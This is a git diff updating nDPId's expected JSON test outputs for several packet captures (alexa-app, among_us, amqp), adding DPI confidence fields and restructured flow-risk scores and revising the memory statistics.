-00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00716{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00822{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","total-events-serialized":1098}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 3435/3406
@@ -1104,10 +1104,10 @@
 ~~ total active/idle flows...: 160/160
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5401919 bytes
-~~ total memory freed........: 5401919 bytes
-~~ total allocations/frees...: 104229/104229
+~~ total memory allocated....: 5413216 bytes
+~~ total memory freed........: 5413216 bytes
+~~ total allocations/frees...: 105819/105819
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 2009 chars
-~~ json string avg len.......: 1089 chars
+~~ json string max len.......: 2115 chars
+~~ json string avg len.......: 1142 chars
diff --git a/test/results/among_us.pcap.out b/test/results/among_us.pcap.out
index b121ef5cf..e2297c1aa 100644
--- a/test/results/among_us.pcap.out
+++ b/test/results/among_us.pcap.out
@@ -1,8 +1,8 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"among_us.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":180000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":57,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":57,"pkt_l4_len":23,"ts_msec":946681200000,"pkt":"eJS0JASgYDjgxTWgCABFAAArJhEAAH8RqpAKAAABrGn7qvsEVgcAF2toCAABAIDZAgMGQUFBQUFB"}
-00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":180000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"proto":"AmongUs","breed":"Fun","category":"Game"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":180000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AmongUs","breed":"Fun","category":"Game"}}
+00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":180000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":180000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 639 chars
-~~ json string avg len.......: 454 chars
+~~ json string max len.......: 665 chars
+~~ json string avg len.......: 466 chars
diff --git a/test/results/amqp.pcap.out b/test/results/amqp.pcap.out
index cd8931f88..7efbcd094 100644
--- a/test/results/amqp.pcap.out
+++ b/test/results/amqp.pcap.out
@@ -1,7 +1,7 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"amqp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"}
 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -10,13 +10,13 @@
 01059{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="}
